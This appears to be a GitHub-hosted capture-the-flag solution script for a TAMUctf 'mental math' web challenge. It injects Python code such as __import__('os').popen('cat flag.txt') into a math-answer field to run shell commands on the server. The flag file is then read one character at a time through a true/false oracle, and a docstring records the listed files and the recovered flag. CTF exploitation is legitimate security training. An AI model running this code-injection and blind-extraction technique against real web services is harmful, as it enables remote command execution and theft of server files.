-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathmEnTaL-MaTh.py
64 lines (54 loc) · 1.27 KB
/
mEnTaL-MaTh.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import requests
import json
from string import printable
URL = 'http://mentalmath.tamuctf.com/ajax/new_problem'
def e(payload, ans):
data = requests.post(URL, headers={'X-Requested-With': 'XMLHttpRequest'}, data={'problem': payload, 'answer': str(ans)}).text
try:
return json.loads(data)
except:
return {'correct': False, 'bad': True, 'real': data}
"""
target = 'list(globals().keys())[1..15]'
globals()
__name__
__doc__
__pac...
__loade,,,
__spec__
__file__
__cache,,,
__builtins..
render
JsonResp
random
index
play
new_pr...
gen_probl...
target = "__import__('os').popen('ls -a').read()"
ls -a
.
..
.dockerignore
db.sqlite3
flag.txt
mana...
__import__('os').popen('cat flag.txt').read()
cat flag.txt
gigem{1_4m_g0od_47_m4tH3m4aatics_n07_s3cUr1ty_h3h3h3he}
"""
val = ''
while True:
for c in '_ .\n' + printable:
target = "__import__('os').popen('cat flag.txt').read()"
payload = f'{target}[{len(val)}]'
resp = e(f'ord({payload})', ord(c))
print(f'Trying {c}: {resp}')
if resp['correct']:
val += c
print(f'Process: {val}')
break
else:
print(f'Couldnt next char. Found: {val}.')
break